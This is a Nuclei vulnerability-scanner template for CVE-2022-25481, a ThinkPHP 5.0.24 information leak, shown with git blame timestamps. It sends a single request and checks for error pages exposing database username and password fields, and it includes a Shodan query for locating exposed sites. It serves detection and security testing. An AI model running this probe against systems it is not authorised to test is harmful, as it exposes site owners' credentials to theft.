nuclei-templates/http/cves/2022/CVE-2022-25481.yaml

60 lines
1.6 KiB
YAML
Raw Normal View History

2022-11-24 16:42:41 +00:00
id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: high
2022-11-24 18:21:41 +00:00
description: |
ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
2022-11-24 18:21:41 +00:00
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25481
cwe-id: CWE-668
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
epss-score: 0.0072
2022-11-24 18:21:41 +00:00
metadata:
max-request: 1
2022-11-24 18:21:41 +00:00
shodan-query: title:"ThinkPHP"
2023-06-04 08:13:42 +00:00
verified: true
2022-11-25 07:38:40 +00:00
tags: cve,cve2022,thinkphp,exposure,oss
2022-11-24 16:42:41 +00:00
http:
2022-11-24 16:42:41 +00:00
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
2023-06-10 13:33:20 +00:00
part: body
2022-11-24 16:42:41 +00:00
words:
2023-06-10 13:33:20 +00:00
- "_DATABASE</td>"
- "_USERNAME</td>"
- "_PASSWORD</td>"
condition: and
2022-11-24 18:21:41 +00:00
- type: word
2023-06-10 13:33:20 +00:00
part: body
2022-11-24 18:21:41 +00:00
words:
2023-06-10 13:33:20 +00:00
- "<title>系统发生错误</title>"
- "<title>System Error</title>"
2022-11-24 18:21:41 +00:00
condition: or
2022-11-24 16:42:41 +00:00
2023-06-10 13:33:20 +00:00
- type: word
part: body
words:
- "Exception"
- "REQUEST_TIME"
condition: and
2022-11-24 16:42:41 +00:00
- type: status
status:
2023-06-10 13:33:20 +00:00
- 200
- 500
2022-11-24 16:42:41 +00:00
- 404
2023-06-10 13:33:20 +00:00
condition: or